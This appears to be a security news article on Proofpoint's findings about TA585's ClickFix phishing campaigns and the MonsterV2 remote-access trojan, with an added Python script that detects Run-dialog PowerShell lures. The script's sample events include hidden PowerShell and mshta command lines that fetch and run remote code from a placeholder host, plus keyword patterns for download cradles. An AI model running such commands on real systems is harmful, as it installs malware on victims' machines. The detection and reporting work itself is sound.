IRS Themed ClickFix Landing leading to MonsterV2 | Image: Proofpoint
Proofpoint has identified a new and highly self-reliant cybercriminal threat actor, tracked as TA585, which operates with an unusual degree of independence in today’s cybercrime economy. Unlike most malware distributors who rely on initial access brokers or third-party delivery services, TA585 controls every stage of its attack chain — from infrastructure and delivery to payload deployment.
Proofpoint first detected TA585’s activity in February 2025, when the group sent U.S. Internal Revenue Service (IRS)-themed phishing emails containing links to malicious PDFs. The PDFs in turn linked to compromised sites that displayed fake verification pages using the ClickFix technique.
Victims were instructed to manually execute a PowerShell command via the Windows “Run” dialog box, unknowingly initiating the download of MonsterV2.
“Messages contained URLs linking to a PDF which would open in the browser. The PDF linked to a webpage that was using the ClickFix technique, which lures visitors to manually run a malicious command in the Windows Run-box or PowerShell terminal.”
Subsequent campaigns in March 2025 impersonated both the IRS and the U.S. Small Business Administration (SBA), primarily targeting finance and accounting firms in small waves of fewer than 200 phishing messages each.
By April 2025, Proofpoint observed TA585 evolving into a fully autonomous operator. The group registered and maintained its own malicious infrastructure, identified by researchers as CoreSecThree, which hosted web injects and filtering systems to deliver payloads only to human targets.
“TA585 activity is typically distributed via compromised websites… The websites have been compromised with a malicious JavaScript injection. This injection causes the website to load a malicious script which, in campaigns so far this year, is used to create an overlay of the compromised website to present a fake CAPTCHA (ClickFix) instructing users to verify they are human.”
The overlay doubles as a filter: only a visitor who follows the prompt and runs the PowerShell command triggers the malware download. Once the command has executed, the infection is confirmed back to the actor’s infrastructure and the victim is redirected to a legitimate webpage, which reduces the chance of raising suspicion.
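Detection is the practitioner’s side of the ClickFix chain described above, both the command typed into the Windows Run box in the February campaign and the fake-CAPTCHA overlay on compromised sites. The following is an added example written for this page; it is not Proofpoint’s code and nothing in it was recovered from TA585. It scores process-creation events (fields modeled on Sysmon Event ID 1 / Windows 4688 records; the sample events are constructed) and flags an interpreter launched directly from explorer.exe, which hosts the Run dialog, when the command line also carries a download cradle, a URL, or hidden-window/encoded-command flags. The indicator strings are generic ClickFix heuristics, not TA585-specific signatures, and the threshold is a tuning choice.

```python
import re

# Indicators are generic ClickFix heuristics (paste-and-run lures), not TA585 signatures.
DOWNLOAD_CRADLE = re.compile(
    r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile|"
    r"curl|wget|certutil|bitsadmin|mshta)\b", re.I)
EXEC_HINTS = re.compile(
    r"(?:\biex\b|invoke-expression|-enc(?:odedcommand)?\b|-w(?:indowstyle)?\s+hidden|"
    r"-nop(?:rofile)?\b|-ep\s+bypass|executionpolicy\s+bypass)", re.I)
URL = re.compile(r"https?://", re.I)
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
# explorer.exe hosts the Win+R Run dialog; a command typed there becomes its direct child.
RUN_DIALOG_PARENTS = {"explorer.exe"}


def _basename(path):
    return path.lower().rsplit("\\", 1)[-1]


def score_event(event):
    """Return (score, reasons) for one process-creation event.
    Fields are modeled on Sysmon Event ID 1 / Windows 4688: parent_image, image, command_line."""
    reasons = []
    if _basename(event["image"]) not in INTERPRETERS:
        return 0, reasons
    cmd = event["command_line"]
    if _basename(event["parent_image"]) in RUN_DIALOG_PARENTS:
        reasons.append("interpreter launched directly by explorer.exe (Run dialog)")
    if DOWNLOAD_CRADLE.search(cmd):
        reasons.append("download cradle in command line")
    if EXEC_HINTS.search(cmd):
        reasons.append("hidden-window / encoded / in-memory execution flags")
    if URL.search(cmd):
        reasons.append("URL on the command line")
    return len(reasons), reasons


def find_clickfix(events, threshold=3):
    """Events scoring at least `threshold` signals, returned as (pid, score, reasons)."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((ev["pid"], score, reasons))
    return hits


# Constructed sample events (not real telemetry); example.invalid is a reserved name.
SAMPLE_EVENTS = [
    {"pid": 1001, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": 'powershell -w hidden -c "iwr https://example.invalid/verify | iex"'},
    {"pid": 1002, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe"},  # user simply opened a shell from Run
    {"pid": 1003, "parent_image": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -NoProfile -File C:\ProgramData\Scripts\maint.ps1"},
    {"pid": 1004, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "command_line": "mshta https://example.invalid/check.hta"},
    {"pid": 1005, "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd /c dir"},
]

if __name__ == "__main__":
    for pid, score, reasons in find_clickfix(SAMPLE_EVENTS):
        print(pid, score, "; ".join(reasons))
```

Two caveats for use on real telemetry. A command pasted into an already open PowerShell terminal, which the Proofpoint quote also mentions, is a child of that powershell.exe rather than of explorer.exe, so the parent signal is absent and the cradle, URL and flag signals have to carry the detection on their own. And on the host, commands entered in the Run dialog are recorded under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, which is worth pulling during triage even when process telemetry is missing.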
Beyond web injects, TA585 has experimented with GitHub notification abuse to reach developers and technical targets. In these campaigns, the actor created fake GitHub issues and tagged legitimate users, prompting automated GitHub emails containing malicious shortened URLs.
These URLs led to actor-controlled sites hosting fake GitHub-branded verification pages that used the same CoreSecThree filtering and beaconing methods, ultimately downloading Rhadamanthys or MonsterV2 malware.
At the heart of TA585’s campaigns is MonsterV2, a feature-rich Remote Access Trojan (RAT), stealer, and loader first observed for sale on cybercrime forums in February 2025.
Proofpoint researchers describe MonsterV2 as “advertised as a remote access trojan (RAT), stealer, and loader… It is expensive compared to its peer malware families, and used by only a small number of actors, including TA585.”
The malware is written in C++, Go, and TypeScript, with RAII wrappers, thread-safe components, and ChaCha20 encryption for both its configuration and C2 communication. Its capabilities include:
- Credential, browser, and crypto wallet theft
- Clipboard hijacking (cryptocurrency address replacement)
- Hidden Virtual Network Computing (HVNC) for stealth remote control
- Command execution via PowerShell or CMD
- Screen recording, webcam access, and keylogging
Proofpoint notes, “MonsterV2 has capabilities of a remote access trojan (RAT), loader, and stealer… It avoids infecting computers in Commonwealth of Independent States (CIS) countries.”
Pricing on underground forums reflects its premium status: the “Standard” version costs $800/month, while the “Enterprise” tier — which includes full HVNC, loader, and stealer modules — runs $2,000/month.
The malware uses a custom crypter called SonicCrypt for obfuscation, which Proofpoint describes as “a modern technological crypt with many functions, prompt cleaning and professional support.”
MonsterV2 employs ChaCha20 encryption to protect both its configuration and C2 communications.
“The config is decrypted using ChaCha20… The malware reads the first 32 bytes prior to its config as key material, combines it with a hardcoded master key, and decrypts the configuration.”
After connecting to its command-and-control server, the malware transmits detailed system metadata — including the OS version, geolocation, username, and external IP — then waits for further instructions.
The C2 can issue a variety of commands, from data exfiltration and process manipulation to HVNC session creation and ransomware-like shutdowns.